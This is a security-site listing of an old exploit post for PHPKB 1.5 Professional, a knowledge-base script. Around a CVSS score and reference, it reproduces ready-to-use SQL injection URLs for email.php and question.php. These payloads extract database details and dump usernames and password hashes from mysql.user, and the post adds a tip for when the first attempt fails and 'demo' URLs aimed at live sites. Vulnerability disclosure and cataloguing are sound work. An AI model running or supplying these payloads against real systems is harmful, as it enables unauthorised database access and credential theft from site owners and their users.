PHPKB 1.5 Professional Multiple Remote SQL Injection Vulnerabilities

2008.11.18
Credit: d3v1l
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[~] PHPKB Knowledge Base Software v1.5 Professional (email.php) - SQL Injection Vulnerability [~] [~] http://www.knowledgebase-script.com [~] ---------------------------------------------------------- [~] Bug founded by d3v1l [~] [~] Date: 20.09.2007 [~] [~] [~] d3v1l@spoofer.com [~] [~] ----------------------------------------------------------- [~] Greetz tO:- [~] [~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) [~] [~] Pentest|Gibon|Pig [~]------------------------------------------------------------- [~] Exploit :- [~] [~] http://site.com/email.php?ID=SQL [~] [~] Demo :- [~] [~] [~] http://xxxx.com/email.php?ID=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/* [~] [~]---------------------------------------------------------------------------------------------------------------------- 2 [~] PHPKB Knowledge Base Software v1.5 Professional (question.php) - SQL Injection Vulnerability [~] [~] http://www.knowledgebase-script.com [~] ---------------------------------------------------------- [~] Bug founded by d3v1l [~] [~] Date: 20.09.2007 [~] [~] [~] d3v1l@spoofer.com [~] [~] ----------------------------------------------------------- [~] Greetz tO:- [~] [~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) [~] [~] Pentest|Gibon|Pig [~]------------------------------------------------------------- [~] Exploit :- [~] [~] http://site.com/question.php?ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())/* [~] http://site.com/question.php?ID=1 UNION SELECT concat(user,char(58),password) FROM mysql.user/* [~] [~] If he does not work test yet -> /question.php?ID=-1 [~] [~] Demo :- [~] [~] http://xxxx.com/kb/question.php?ID=1%20UNION%20SELECT%20concat(user,char(58),password)%20FROM%20mysql.user%20/* [~] [~] http://xxxx.com/kb/question.php?ID=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())/* [~] [~]----------------------------------------------------------------------------------------------------------------------

References:

http://www.securityfocus.com/bid/31279


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top